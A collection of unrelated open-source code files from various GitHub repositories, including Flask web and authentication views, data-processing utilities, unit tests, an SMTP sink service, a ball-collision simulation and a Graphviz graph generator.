self.g.db.cursor() cursore.execute(query, parametri) self.g.db.commit() cursore.close()
3,601
test/test_pipeline_manager.py
zuevval/topological-sorting
0
2172200
from pipeline_manager import pipeline def test_pipeline_manager(): add_step = pipeline() a = [] @add_step def step1(): a.append(1) @add_step(depends_on=["step1"]) def step2(): a.append(2) @add_step(depends_on=["step1", "step2"]) def step3(): a.append(3) @add_step(depends_on=["step1", "step2", "step3"]) def step4(): a.append(4) step4() assert a == [1, 1, 2, 1, 1, 2, 3, 4] a = [] step3() assert a == [1, 1, 2, 3] @add_step def step5(): a.append(5) a = [] step4() assert a == [1, 1, 2, 1, 1, 2, 3, 4] a = [] step5() assert a == [5]
675
app/lib/email_utils.py
joelbcastillo/NYCOpenRecords
0
2172498
#!/usr/bin/python # -*- coding: utf-8 -*- """ app.lib.email_utils ~~~~~~~~~~~~~~~~ Implements e-mail notifications for OpenRecords. Flask-mail is a dependency, and the following environment variables need to be set in order for this to work: (Currently using Fake SMTP for testing) MAIL_SERVER: 'localhost' MAIL_PORT: 2500 MAIL_USE_TLS: FALSE MAIL_USERNAME: os.environ.get('MAIL_USERNAME') MAIL_PASSWORD: <PASSWORD>('MAIL_PASSWORD') DEFAULT_MAIL_SENDER: 'Records Admin <<EMAIL>>' """ from flask import current_app, render_template from flask_mail import Message from app import mail, celery, sentry from app.models import Requests @celery.task def send_async_email(msg): try: mail.send(msg) except Exception as e: sentry.captureException() current_app.logger.exception("Failed to Send Email {} : {}".format(msg, e)) def send_contact_email(subject, recipients, body, sender): msg = Message(subject, recipients, body, sender=sender) send_async_email.delay(msg) def send_email(subject, to=list(), cc=list(), bcc=list(), template=None, email_content=None, **kwargs): """ Function that sends asynchronous emails for the application. Takes in arguments from the frontend. :param to: Person(s) email is being sent to :param cc: Person(s) being CC'ed on the email :param bcc: Person(s) being BCC'ed on the email :param subject: Subject of the email :param template: HTML and TXT template of the email content :param email_content: string of HTML email content that can be used as a message template :param kwargs: Additional arguments the function may take in (ie: Message content) """ assert to or cc or bcc msg = Message(current_app.config['MAIL_SUBJECT_PREFIX'] + ' ' + subject, sender=current_app.config['MAIL_SENDER'], recipients=to, cc=cc, bcc=bcc) # Renders email template from .txt file commented out and not currently used in development # msg.body = render_template(template + '.txt', **kwargs) if email_content: msg.html = email_content else: msg.html = render_template(template + '.html', **kwargs) attachment = kwargs.get('attachment', None) if attachment: filename = kwargs.get('filename') mimetype = kwargs.get('mimetype', 'application/pdf') msg.attach(filename, mimetype, attachment) send_async_email.delay(msg) def get_agency_emails(request_id, admins_only=False): """ Gets a list of the agency emails (assigned users and default email) :param request_id: FOIL request ID to query UserRequests :param admins_only: return list of agency admin emails only :return: list of agency emails or ['<EMAIL>'] (for testing) """ request = Requests.query.filter_by(id=request_id).one() if admins_only: return list(set(user.notification_email if user.notification_email is not None else user.email for user in request.agency.administrators)) return list(set([user.notification_email if user.notification_email is not None else user.email for user in request.agency_users] + [request.agency.default_email]))
3,250
topCoder/srms/100s/srm152/div2/league_picks.py
ferhatelmas/algo
25
2172187
class LeaguePicks: def returnPicks(self, position, friends, picks): ls, d, r, i = [], True, friends - position + 1, 0 while (d and picks >= position) or (not d and picks >= r): ls.append(i + (position if d else r)) i += friends picks -= friends d = not d return ls
341
actioneer/performer.py
Ayplow/Actioneer
0
2172444
from typing import List, Any, Dict, Callable, Tuple from .errors import NoClosingQuote, NoActionFound from .utils import get_ctxs, Flags, Options from .action import Action import re import traceback from inspect import isawaitable quoteRe = re.compile(r"[\"']") chunk = re.compile(r"\S+") class SourceStr(str): pass class Performer: def __init__(self, ctx: Tuple[Any, ...] = (), *, loop=None): self.commands = {} self.lookup = {} self.ctx = ctx + (self,) self.loop = loop def register(self, cmd): self.commands[cmd.name] = cmd self.lookup[cmd.name] = cmd cmd.performer = self for alias in cmd.aliases: self.lookup[alias] = cmd return cmd def run(self, args, ctx: Tuple[Any] = ()): cmd_name = args.split(" ")[0] cmd = self.lookup.get(cmd_name) try: if cmd: args = self.split_args(args) options, args = self.get_options(args, cmd.options, cmd.option_aliases) flags, args = self.get_flags(args, cmd.flags, cmd.flag_aliases) flags = Flags(flags) options = Options(options) if self.loop: coro = cmd.async_invoke(args[1:], ctx + self.ctx + (flags, options, SourceStr(args[args.index(" ") +1:]))) return self.loop.create_task(coro) else: return cmd.invoke(args[1:], ctx + self.ctx + (flags, options, SourceStr(args[args.index(" ") +1:]))) raise NoActionFound("No Action called {} found".format(cmd_name)) except Exception as e: if self.loop: if cmd and cmd.error_handler: self.loop.create_task(cmd.async_run_fail(e, ctx)) else: self.loop.create_task(self.async_run_fail(e, ctx)) else: if cmd and cmd.error_handler: cmd.run_fail(e, ctx) else: self.run_fail(e, ctx) def error(self, func): self.fail = func def fail(self, e): traceback.print_exception(type(e), e, e.__traceback__) def run_fail(self, e, ctx: Tuple[Any] = ()): ctxs = get_ctxs(self.fail, ctx) self.fail(e, **ctxs) async def async_run_fail(self, e, ctx: List[Any] = ()): ctxs = get_ctxs(self.fail, ctx) if isawaitable(self.fail): await self.fail(e, **ctxs) else: self.fail(e, **ctxs) def split_args(self, s: str) -> List[str]: """Will split the raw input into the arguments""" args = [] i = 0 while i < len(s): char = s[i] if re.match(quoteRe, char): try: j = s.index(char, i+1) args.append(s[i + 1: j]) i = j except ValueError: raise NoClosingQuote("Missing closing quote.") else: match = chunk.match(s, i) if match: args.append(match.group()) i = match.end() i += 1 return args def get_options(self, inp: List[str], options: Dict[str, Callable], aliases: Dict[str, str]) -> Tuple[Dict[str, bool], List[str]]: """Will get options, the return will be converted as setup""" options_out = {} for i, arg in enumerate(inp): name = arg[2:] if not arg.startswith("-"): continue try: if arg.startswith("-") and name in options.keys(): options_out[name] = options[name](inp[i+1]) del inp[i] del inp[i] elif arg.startswith("-") and name in aliases.keys(): options_out[aliases[name]] = options[name](inp[i+1]) del inp[i] del inp[i] except Exception as e: raise e return options_out, inp def get_flags(self, inp: List[str], flags: List[str], aliases: Dict[str, str]) -> Tuple[Dict[str, bool], List[str]]: """Will get all flags""" out = {name: False for name in flags} for i, arg in enumerate(inp): name = arg[1:] if arg.startswith("-") and name in flags: out[name] = True del inp[i] elif arg.startswith("-") and name in aliases.keys(): out[aliases[name]] = True del inp[i] return out, inp
4,833
data/utils.py
YDDDDG/3D2Unet
1
2172260
import numpy as np import torch import gc class Crop(object): """ Crop randomly the image in a sample. Args: output_size (tuple or int): Desired output size. If int, square crop is made. """ def __init__(self, output_size): assert isinstance(output_size, (int, tuple, list)) if isinstance(output_size, int): self.output_size = (output_size, output_size) else: assert len(output_size) == 2 self.output_size = output_size def __call__(self, sample): image, label = sample['image'], sample['label'] top, left = sample['top'], sample['left'] new_h, new_w = self.output_size new_h//=2 new_w//=2 sample['image'] = image[top: top + new_h, left: left + new_w,:] sample['label'] = label[top*2: (top + new_h)*2, left*2: (left + new_w)*2,:] return sample class Flip(object): """ shape is (h,w,c) """ def __call__(self, sample): flag_lr = sample['flip_lr'] flag_ud = sample['flip_ud'] if flag_lr == 1: sample['image'] = np.fliplr(sample['image']) sample['label'] = np.fliplr(sample['label']) if flag_ud == 1: sample['image'] = np.flipud(sample['image']) sample['label'] = np.flipud(sample['label']) return sample class Rotate(object): """ shape is (h,w,c) """ def __call__(self, sample): flag = sample['rotate'] if flag == 1: sample['image'] = sample['image'].transpose(1, 0, 2) sample['label'] = sample['label'].transpose(1, 0, 2) return sample class Sharp2Sharp(object): def __call__(self, sample): flag = sample['s2s'] if flag < 1: sample['image'] = sample['label'].copy() return sample class ToTensor(object): """ Convert ndarrays in sample to Tensors. """ def __call__(self, sample): image, label = sample['image'], sample['label'] # swap color axis because # numpy image: H x W x C # torch image: C X H X W image = np.ascontiguousarray(image.transpose((2, 0, 1))[np.newaxis, :]) label = np.ascontiguousarray(label.transpose((2, 0, 1))[np.newaxis, :]) sample['image'] = torch.from_numpy(image).float() sample['label'] = torch.from_numpy(label).float() return sample def normalize(x, centralize=False, normalize=False, val_range=255.0): if centralize: x = x - val_range / 2 if normalize: x = x / val_range return x def normalize_reverse(x, centralize=False, normalize=False, val_range=255.0): if normalize: x = x * val_range if centralize: x = x + val_range / 2 return x def equalize_histogram(image, number_bins=256): image_histogram, bins = np.histogram(image.flatten(), number_bins) cdf = image_histogram.cumsum() cdf = (number_bins - 1) * cdf / cdf[-1] # normalize image_equalized = np.interp(image.flatten(), bins[:-1], cdf) return image_equalized.reshape(image.shape) def get_file_path(ds_type, gain='00', root_path='/data/zengyuhang_data'): ds_type=ds_type FILE_LIST="./data_list/"+ ds_type + "_list" # get train IDs with open(FILE_LIST) as f: text = f.readlines() _files = text _ids = [line.strip().split(' ')[0] for line in _files] gt_files = [line.strip().split(' ')[1] for line in _files] in_files = [line.strip().split(' ')[2] for line in _files] gain=gain _ids_copy=[] for item in _ids: if item[-7:-5]==gain: _ids_copy.append(item) _ids=_ids_copy root_path=root_path gt_files_copy=[] for item in gt_files: if item[-11:-9]==gain: gt_files_copy.append(root_path+item[1:]) gt_files=gt_files_copy in_files_copy=[] for item in in_files: if item[-11:-9]==gain: in_files_copy.append(root_path+item[1:]) in_files=in_files_copy return _ids, gt_files, in_files def get_all_file_path(ds_type, root_path='/data/zengyuhang_data'): ds_type=ds_type FILE_LIST="./data_list/"+ ds_type + "_list" # get train IDs with open(FILE_LIST) as f: text = f.readlines() _files = text _ids = [line.strip().split(' ')[0] for line in _files] gt_files = [line.strip().split(' ')[1] for line in _files] in_files = [line.strip().split(' ')[2] for line in _files] return _ids, gt_files, in_files def gen_var(seqs): records=dict() for seq in seqs: sample=dict() print(seq[0],"start loading...") temp_dark=np.load(seq[0]) dark_shape=temp_dark.shape del temp_dark gc.collect() print(seq[0],"start loading and EH process...") sample['Dark']=equalize_histogram(np.memmap(seq[0], dtype='uint16', mode='r',shape=dark_shape),65536) # sample['Dark']=equalize_histogram(np.load(seq[0]),65536) print(seq[0],"is processed") print(seq[1],"start loading...") temp_bright=np.load(seq[1]) bright_shape=temp_bright.shape del temp_bright gc.collect() sample['Bright']=np.memmap(seq[1], dtype='uint8', mode='r',shape=bright_shape) # sample['Bright']=np.load(seq[1]) print(seq[1],"is loaded") # print('dark_shape',sample['Dark'].shape) # print('bright_shape',sample['Bright'].shape) records[seq]=sample return records def gen_seq(seq): sample=dict() print(seq[0],"start loading...") temp_dark=np.load(seq[0]) dark_shape=temp_dark.shape del temp_dark gc.collect() print(seq[0],"start loading and EH process...") sample['Dark']=equalize_histogram(np.memmap(seq[0], dtype='uint16', mode='r',shape=dark_shape),65536) print(seq[0],"is processed") print(seq[1],"start loading...") temp_bright=np.load(seq[1]) bright_shape=temp_bright.shape del temp_bright gc.collect() sample['Bright']=np.memmap(seq[1], dtype='uint8', mode='r',shape=bright_shape) print(seq[1],"is loaded") # print('dark_shape',sample['Dark'].shape) # print('bright_shape',sample['Bright'].shape) return sample
6,605
lead/web_app.py
M4gicT0/Distribute
0
2172181
import os import json import errno from node import Node from subprocess import call from werkzeug import secure_filename from flask import Flask, render_template, abort, request, jsonify app = Flask(__name__) controller = None ip = None port = None class WebApp(): def __init__(self, ctrl, host, p): global controller, ip, port controller = ctrl ip = host port = p @app.route('/', methods=['GET']) def show_page(): try: return render_template('upload.html', rest_host=ip, rest_port=port, entries=controller.get_ledger_entries()) except TemplateNotFound: abort(404) @app.route('/storage', methods=['POST']) def upload_file(): if 'file' in request.files: success = controller.store( secure_filename(request.files['file'].filename), request.files['file'] ) if success: response = jsonify({"msg": 'File uploaded successfully.'}) response.status_code = 200 return response else: response = jsonify({"msg": "File couldn't be written to nodes."}) response.status_code = 500 return response return jsonify({"msg": "File not present in request"}) @app.route('/storage/<file_name>', methods=['GET']) def download_file(file_name): file = controller.retrieve( secure_filename(request.args.get('file_name')) ) if file: response = jsonify({"content": file}) response.status_code = 200 return response else: response = jsonify({"msg": "File couldn't be found."}) response.status_code = 500 return response @app.route('/strategy/<choice>', methods=['POST']) def set_strategy(choice): controller.set_strategy(choice) def start(self): app.run(debug=True, host=ip, port=port)
2,041
classical_algorithms/python/tests/test_binary_search.py
ajeet1308/code_problems
61
2172605
import unittest from classical_algorithms.python.BinarySearch import BinarySearch class TestBinarySearch(unittest.TestCase): def test_binary_search(self): binary_search = BinarySearch() print('None Input') self.assertRaises(TypeError, binary_search.search, None) print('Empty Input') self.assertEqual(binary_search.search([], 1), False) print('One Element') self.assertEqual(binary_search.search([25], 25), 0) print('Two or More Elements') array = [0, 10, 15, 100, 150, 200, 203, 230] self.assertEqual(binary_search.search(array, 15), 2) print('Two or More with negative Elements') array = [-20, -15, -5, 0, 10, 15, 100, 150, 200, 203, 230] self.assertEqual(binary_search.search(array, -15), 1) print('Success: binary_search_search\n') if __name__ == '__main__': unittest.main()
906
server/website/script/fixture_generators/metric_settings/oracle/create_metric_settings.py
mjain2/ottertune
1
2171522
# # OtterTune - create_metric_settings.py # # Copyright (c) 2017-18, Carnegie Mellon University Database Group # import json import shutil def main(): final_metrics = [] with open('oracle.txt', 'r') as f: odd = 0 entry = {} fields = {} lines = f.readlines() for line in lines: line = line.strip().replace("\n", "") if not line: continue if line == 'NAME' or line.startswith('-'): continue if odd == 0: entry = {} entry['model'] = 'website.MetricCatalog' fields = {} fields['name'] = "global." + line fields['summary'] = line fields['vartype'] = 2 # int fields['scope'] = 'global' fields['metric_type'] = 3 # stat if fields['name'] == "global.user commits": fields['metric_type'] = 1 # counter fields['dbms'] = 18 # oracle entry['fields'] = fields final_metrics.append(entry) with open('oracle_metrics.json', 'w') as f: json.dump(final_metrics, f, indent=4) shutil.copy('oracle_metrics.json', '../../../../website/fixtures/oracle_metrics.json') if __name__ == '__main__': main()
1,346
setup.py
kahinton/wsgimagic
0
2172461
from setuptools import setup, find_packages with open('README.md', 'r') as readme: long_desc = readme.read() setup(name='wsgimagic', version='1.0.0', description='Serverless WSGI apps made easy', packages=find_packages(exclude=('tests',)), author="<NAME>", license="MIT", long_description=long_desc, long_description_content_type='text/markdown')
396
app/api/auth.py
eddy0/flask-mega
0
2172407
from flask import g, make_response, jsonify from flask_httpauth import HTTPBasicAuth from app.api.errors import error_response from app.models import User auth = HTTPBasicAuth() @auth.verify_password def verify_password(username_or_token, password): user = User.verify_auth_token(username_or_token) if not user: user = User.query.filter_by(username=username_or_token).first() if not user or not user.verify_password(password): return False g.user = user return True @auth.error_handler def basic_auth_error(status): return error_response(status) @auth.error_handler def unauthorized(): return make_response(jsonify({'error': 'Unauthorized access'}), 403)
713
app/esper/queries/interview_with_person_x.py
scanner-research/esper-tv
5
2172002
from esper.prelude import * from .queries import query @query('Interview with person X (rekall)') def interview_with_person_x(): from query.models import LabeledCommercial, FaceIdentity from rekall.video_interval_collection import VideoIntervalCollection from rekall.temporal_predicates import before, after, overlaps from rekall.logical_predicates import or_pred from esper.rekall import intrvllists_to_result # Get list of sandbox video IDs sandbox_videos = [ row.video_id for row in LabeledCommercial.objects.distinct('video_id') ] TWENTY_SECONDS = 600 FORTY_FIVE_SECONDS = 1350 EPSILON = 10 guest_name = "<NAME>" # Load hosts and instances of guest from SQL identities = FaceIdentity.objects.filter(face__shot__video_id__in=sandbox_videos) hosts_qs = identities.filter(face__is_host=True) guest_qs = identities.filter(identity__name=guest_name).filter(probability__gt=0.7) # Put bounding boxes in SQL hosts = VideoIntervalCollection.from_django_qs( hosts_qs.annotate(video_id=F("face__shot__video_id"), min_frame=F("face__shot__min_frame"), max_frame=F("face__shot__max_frame")) ) guest = VideoIntervalCollection.from_django_qs( guest_qs.annotate(video_id=F("face__shot__video_id"), min_frame=F("face__shot__min_frame"), max_frame=F("face__shot__max_frame")) ) # Get all shots where the guest and a host are on screen together guest_with_host = guest.overlaps(hosts).coalesce() # This temporal predicate defines A overlaps with B, or A before by less than 10 frames, # or A after B by less than 10 frames overlaps_before_or_after_pred = or_pred( or_pred(overlaps(), before(max_dist=EPSILON), arity=2), after(max_dist=EPSILON), arity=2) # This code finds sequences of: # guest with host overlaps/before/after host OR # guest with host overlaps/before/after guest interview_candidates = guest_with_host \ .merge(hosts, predicate=overlaps_before_or_after_pred) \ .set_union(guest_with_host.merge( guest, predicate=overlaps_before_or_after_pred)) \ .coalesce() # Sequences may be interrupted by shots where the guest or host don't # appear, so dilate and coalesce to merge neighboring segments interviews = interview_candidates \ .dilate(TWENTY_SECONDS) \ .coalesce() \ .dilate(-1 * TWENTY_SECONDS) \ .filter_length(min_length=FORTY_FIVE_SECONDS) # Return intervals return intrvllists_to_result(interviews.get_allintervals())
2,685
services/mail-sink.py
easydns/chapps
1
2172123
#!/usr/bin/env python3 """ Starts a service on 127.0.0.1:25025 which serves as a sink for email """ ### requires the python-pidfile library from https://github.com/mosquito/python-pidfile ### requires aiosmtpd import asyncio, pidfile, signal, functools from smtplib import SMTP, SMTPRecipientsRefused import aiosmtpd from aiosmtpd.handlers import Sink from aiosmtpd.smtp import SMTP as SMTPServer import logging LISTEN_PORT = 25025 # TRANSMIT_PORT = 10026 logger = logging.getLogger(__name__) logger.setLevel(logging.DEBUG) def signal_handler(sig, *args): if sig in {signal.SIGTERM, sig.SIGINT}: logger.debug(f"CHAPPS exiting on {signal.Signals(sig)} ({sig}).") raise SystemExit def install_asyncio_signal_handlers(loop): for signame in {"SIGTERM", "SIGINT"}: sig = getattr(signal, signame) loop.add_signal_handler(sig, functools.partial(signal_handler, sig)) # class NullFilterHandler: # async def handle_RCPT(self, server, session, envelope, address, rcpt_options): # """Handle recipient phase""" # envelope.rcpt_tos.append( address ) # return "250 OK" # async def handle_DATA(self, server, session, envelope): # """Handle DATA phase""" # logger.debug(f"Message from {envelope.mail_from} to ") # try: # client = SMTP.sendmail( envelope.mail_from, envelope.rcpt_tos, envelope.content ) # return '250 Message accepted for delivery' # except smtplib.SMTPResponseException as e: # logger.exception("Upstream Postfix did not like this message.") # return f"{e.smtp_code} {e.smtp_error}" # except smtplib.SMTPException: # logger.exception("Raised trying to send from {envelope.mail_from} to {','.join(envelope.rcpt_tos)}") # return "550 Requested action not taken" async def main(): """The grand shebang""" logger.debug("Starting SMTP sink...") try: with pidfile.PIDFile("/tmp/mail-sink.pid"): logger.debug("mail-sink started.") loop = asyncio.get_running_loop() install_asyncio_signal_handlers(loop) srv = await loop.create_server( functools.partial(SMTPServer, Sink), "localhost", LISTEN_PORT, start_serving=False, ) async with srv: await srv.serve_forever() except pidfile.AlreadyRunningError: logger.exception("mail-sink is already running. Exiting.") except asyncio.exceptions.CancelledError: logger.debug("mail-sink exiting on signal.") if __name__ == "__main__": try: asyncio.run(main()) except Exception: logger.exception("UNEX")
2,751
maincode.py
ParthaAcharjee/Ball-Movement-in-2D
0
2172393
# Ball movement in 2D space: An example of elastic collision and position tracking. import random as rnd import matplotlib.pyplot as plt import numpy as np import matplotlib.animation as animation class ball: 'Ball class, store ball position and velocities' count=0 def __init__(self,**arg): if 'x' in arg.keys(): self.x=arg['x']; else: self.x=rnd.randrange(0,100,1); if 'y' in arg.keys(): self.y=arg['y']; else: self.y=rnd.randrange(0,100,1); if 'r' in arg.keys(): self.r=arg['r']; else: self.r=1; if 'vx' in arg.keys(): self.vx=arg['vx']; else: self.vx=rnd.randrange(-10,10,1); if 'vy' in arg.keys(): self.vy=arg['vy']; else: self.vy=rnd.randrange(-10,10,1); ball.count+=1; def show(self): print("x,y,vx,vy: ",self.x,self.y,self.vx,self.vy) def plot(self): plt.scatter(self.x,self.y) plt.show() def updatePosition(self,t,L): xmin,xmax,ymin,ymax=L; xnew=self.x+self.vx*t; ynew=self.y+self.vy*t; if xnew>xmax: xnew=2*xmax-xnew;self.vx=-self.vx; if xnew<xmin: xnew=2*xmin-xnew;self.vx=-self.vx; if ynew>ymax: ynew=2*ymax-ynew;self.vy=-self.vy; if ynew<ymin: ynew=2*ymin-ynew;self.vy=-self.vy; self.x=xnew; self.y=ynew; return ########### End of classes #################### def checkCollision(a,b): return pow(pow(a.x-b.x,2)+pow(a.y-b.y,2),0.5)<(a.r+b.r) def collisionUpdate(a,b): c=((a.vx-b.vx)*(a.x-b.x)+(a.vy-b.vy)*(a.y-b.y))/(pow(a.x-b.x,2)+pow(a.y-b.y,2)); a.vx=a.vx-c*(a.x-b.x); a.vy=a.vy-c*(a.y-b.y); b.vx=b.vx+c*(a.x-b.x); b.vy=b.vy+c*(a.y-b.y); return a,b; ########### End of functions #################### N=50 b=[ball() for k in range(0,N)] t=0.1 boundary=(0,100,0,100) CYCLE=500; ims=[] fig=plt.figure() ax = fig.add_axes([0, 0, 1, 1], frame_on=False) ax.set_xlim(-1, 101), ax.set_xticks([]) ax.set_ylim(-1, 101), ax.set_yticks([]) for cycle in range(0,CYCLE): for m in range(0,N-1): for n in range(m+1,N): collision=checkCollision(b[m],b[n]) if collision: b[m],b[n]=collisionUpdate(b[m],b[n]) continue for k in range(0,N): b[k].updatePosition(t,boundary); data=np.zeros((N,2)) for k in range(0,N): data[k,]=b[k].x,b[k].y #data=np.append(data,[[0,0],[0,100],[100,0],[100,100]],axis=0) #plt.hold(False) im=ax.scatter(data[:,0],data[:,1], animated=True, color='blue') ims.append([im]) #plt.axis([-1,101,-1,101]) #plt.pause(0.0000001) ani = animation.ArtistAnimation(fig, ims, interval=50, blit=True, repeat_delay=10)
3,012
graph_notes/compile/generate_graphs.py
weepingwillowben/interactive_info_graph
0
2172576
from .utils import read_csv,join,key_dictlist_by,linejoin,read_file,write_file import subprocess import os import json import re import multiprocessing from concurrent.futures import ThreadPoolExecutor def create_multiline_description(descrip): words = descrip.split() cur_line = '' lines = [] MAX_LINE_LEN = 32 for word in words: added_line = cur_line + " " + word if len(added_line) > MAX_LINE_LEN: lines.append(cur_line) cur_line = word else: cur_line = added_line if cur_line: lines.append(cur_line) return "<BR/>".join(lines) def create_label(node): title = f"<B>{node['title']}</B>" if node['description'] and node['description'] != "NA": return title+"<BR/>"+create_multiline_description(node['description']) else: return title def generate_graphviz_code(all_nodes,all_relations,show_nodes,node_types,rel_types): show_nodes = set(show_nodes) nodes = [n for n in all_nodes if n['node'] in show_nodes] relations = [rel for rel in all_relations if rel['source'] in show_nodes and rel['dest'] in show_nodes and (rel['type'] == 'dependent' or rel['type'] == 'equal')] node_graph = [f'{n["node"]} [label=<{create_label(n)}>,color="{node_types[n["type"]]["color"]}",id={n["node"]+"__el"}]' for n in nodes] rel_graph = [f'{rel["source"]} -> {rel["dest"]} [color="{rel_types[rel["type"]]["color"]}"]' for rel in relations] graph = f''' digraph search {{ overlap = false; {linejoin(node_graph)} {linejoin(rel_graph)} }} ''' return graph def call_graphviz(graphviz_code): graphviz_args = "dot -Tsvg".split(' ') out = subprocess.run(graphviz_args,input=graphviz_code,stdout=subprocess.PIPE,encoding="utf-8").stdout #print("\n".join(out.split("\n")[:3])) stripped = "\n".join(out.split("\n")[3:]) comments_removed = re.sub("(<!--.*?-->)", "", stripped, flags=re.DOTALL) return comments_removed def get_adj_list(nodes,relations): return {n['node']:[rel['dest'] for rel in relations if rel['source'] == n['node']] for n in nodes} def score_nodes(root,adj_list): scores = dict() depth_nodes = [root] for x in range(10): new_depth_nodes = [] for n in depth_nodes: if n not in scores: scores[n] = 8.**(-x) * (1+1e-5*len(adj_list[n])) for e in adj_list[n]: new_depth_nodes.append(e) depth_nodes = new_depth_nodes sortables_scores = [(v,k) for k,v in scores.items()] sortables_scores.sort(reverse=True) return [n for v,n in sortables_scores] def generate_all_graphs(graph_size,nodes,relations,node_types,rel_types): adj_list = get_adj_list(nodes,relations) nodes_generated = {} node_to_idx = {} vis_codes = [] for node in nodes: node_names = score_nodes(node['node'],adj_list)[:graph_size] if graph_size < len(adj_list) else list(adj_list) uniq_node_names = tuple(sorted(node_names)) if uniq_node_names not in nodes_generated: nodes_generated[uniq_node_names] = len(vis_codes) node_to_idx[node['node']] = len(vis_codes) viz_code = generate_graphviz_code(nodes,relations,node_names,node_types,rel_types) vis_codes.append(viz_code) else: node_to_idx[node['node']] = nodes_generated[uniq_node_names] pool = ThreadPoolExecutor(max_workers=multiprocessing.cpu_count()) svg_codes = list(pool.map(call_graphviz,vis_codes)) graphs = [(node['node'],svg_codes[node_to_idx[node['node']]]) for node in nodes] return graphs def save_graphs_as_files(dest_folder,svg_list): os.makedirs(dest_folder,exist_ok=True) for node_name,svg_code in svg_list: fname = node_name+".svg" dest_path = os.path.join(dest_folder,fname) write_file(dest_path,svg_code) def encode_graphs_as_html(svg_list): all_data = [""] for node_name,svg_code in svg_list: stripped_svg_code = svg_code.replace("\n","") data_str = f'<script id="{node_name+"__svg"}" type="application/svg">{stripped_svg_code}></script>' all_data.append(data_str) return "\n\t\t".join(all_data) if __name__ == "__main__": node_types = key_dictlist_by(read_csv("examples/computer_science/node-types.csv"),'type_id') rel_types = key_dictlist_by(read_csv("examples/computer_science/rel-types.csv"),'type_id') nodes = read_csv("examples/computer_science/nodes.csv") rels = read_csv("examples/computer_science/relationships.csv") show_nodes = [n['node'] for n in nodes] graph_code = (generate_graphviz_code(nodes,rels,show_nodes,node_types,rel_types)) print(graph_code) svg_code = call_graphviz(graph_code) html_code = encode_graphs_as_html([("bob",svg_code)]) print(svg_code) print(html_code)
4,917
SFR.py
mattcwilde/werk-squad-tools
0
2171275
import pandas as pd import numpy as np from astropy import constants as const from astropy import units as u from astropy.cosmology import FlatLambdaCDM def SFR(Ha_array): """ Calculate distance using H-alpha luminosity. ------------------------------------------- Method: Distance calc made using astropy.cosmology packages cosmo.luminosity_distance() method See documentation here: https://docs.astropy.org/en/stable/cosmology/ ------------------------------------------ Args: Numpy nd.array of H-alpha Luminosities ------------------------------------------ Returns: Numpy nd.array """ SFR = np.array([]) SFR_calc = [((7.9e-42) * i) for i in Ha_array] SFR = np.append(SFR, SFR_calc) return SFR def SFR_switchboard(lines_df): """ Assign flags based on which lines are used to calculate SFR/ H-alpha Luminosity if Flag = 'NaN' -- No determination = 'Ha' -- H-alpha lines used = 'Hb' -- H-beta lines used ------------------------------------------- Method Assumed for SFR/H-alpha Lum calculations: Ha_Lum_Ha = (LQ_cut_Ha['Halpha_flux']) * (4 * np.pi * (LQ_cut_Ha['Distance_cm'])**2) Ha_Lum_Hb = ((LQ_cut_Hb['Hbeta_flux']) * 2.86) * (4 * np.pi * (LQ_cut_Hb['Distance_cm'])**2) Where LQ_cut_* corresponds to using the respective *_cond written in this function SFR = ((7.9e-42) * Ha_Lum) ------------------------------------------ Args: DataFrame containing Line Quality information for H-alpha and H-beta ------------------------------------------ Returns: 3 numpy.ndarray (arrays = Flags, Ha indices, Hb indices), all entries dtype = str """ # Make integers for conditionals lines_df.Halpha_LQ.astype('Int64') lines_df.Hbeta_LQ.astype('Int64') # Conditions for each calc Ha_cond = (lines_df['Halpha_LQ']>0) & (lines_df['Halpha_LQ']<2) Hb_cond = (lines_df['Hbeta_LQ']>0) & (lines_df['Hbeta_LQ']<2) & (lines_df['Halpha_LQ']!=1) # Make flags SFR_flags = np.full(len(lines_df), str(np.nan)) SFR_flags[Ha_cond] = 'Ha' SFR_flags[Hb_cond] = 'Hb' return SFR_flags
2,218
src/dataset/writer/csv_writer.py
KlemenGrebovsek/Cargo-stowage-optimization
2
2172511
import csv import os from src.dataset.writer.ds_writer import DatasetWriterInterface from src.model.dataset import Dataset class CSVDatasetWriter(DatasetWriterInterface): def write(self, dir_path: str, file_name: str, dataset: Dataset): """Writes dataset to csv file. Args: file_name: Dataset file name without file extension. dataset: Dataset to write. dir_path: Path to dir. Throws: ValueError Returns: Dataset from file. """ if dir_path is None or len(dir_path) < 1 or not os.path.isdir(dir_path): raise ValueError('Invalid dir path') if file_name is None or len(file_name) < 1: raise ValueError('Invalid file name') full_path = os.path.join(dir_path, file_name+'.csv') if os.path.isfile(full_path): raise ValueError('File already exists') with open(full_path, 'w', newline='') as f: writer = csv.writer(f) writer.writerow([dataset.title]) writer.writerow([dataset.total_packages, dataset.total_stations, dataset.width, dataset.height]) for package in dataset.packages: writer.writerow([package.id, package.station_in, package.station_out, package.weight])
1,393
src/closure_table/auth/views.py
vyacheslav-bezborodov/dvhb
1
2172575
import hashlib from datetime import datetime, timedelta import jwt from aiohttp import web from closure_table.auth.db.queries import user_get from closure_table.settings import JWT_ALGORITHM, JWT_EXP_DELTA_SECONDS, JWT_SECRET async def user_login_view(request): params = await request.json() email = params.get('email') password = params.get('password') async with request.app['db'].acquire() as conn: user = await user_get(conn, email) m = hashlib.sha512() m.update(str(password).encode()) m.update(str(user.get('id')).encode()) if email != user.get('email') or m.hexdigest() != user.get('password'): return web.json_response(status=400, data={ 'error': 'Incorrect email or password' }) expired = datetime.utcnow() + timedelta(seconds=JWT_EXP_DELTA_SECONDS) payload = { 'email': user['email'], 'exp': expired } jwt_token = jwt.encode(payload, JWT_SECRET, JWT_ALGORITHM) return web.json_response({ 'token': jwt_token.decode(), 'expired': expired.strftime('%c'), })
1,092
src/app/model/group.py
SLeRest/3DSliceServer
1
2171818
from model.base import BaseModel from schema.group import GroupOut from sqlalchemy import ( Column, String ) from sqlalchemy.orm import relationship class Group(BaseModel): __tablename__ = 'GROUP' name = Column('NAME', String, nullable=False, unique=True) group_user = relationship("UserGroup", back_populates="group") group_permission = relationship("Permission", back_populates="group") group_permission_part = relationship("PermissionPart", back_populates="group") def ToGroupOut(self) -> GroupOut: return GroupOut( id = self.id, name = self.name, created_at = self.created_at, updated_at = self.updated_at )
711
hwtHls/ssa/__init__.py
Nic30/hwtHls
8
2172323
""" This module is similar to a LLVM SSA. https://releases.llvm.org/2.6/docs/LangRef.html#i_load """
101
config.py
Mogekoff/xopygame
0
2172016
w_widht = 500 w_height = 500 colors = { 'grid': (255,255,255), 'background': (0,0,0), 'x': (255,0,0), 'o': (0,255,0), 'cross': (0,0,255)}
192
resources/reddit.py
WasinUddy/Reddit-Image-Scraper
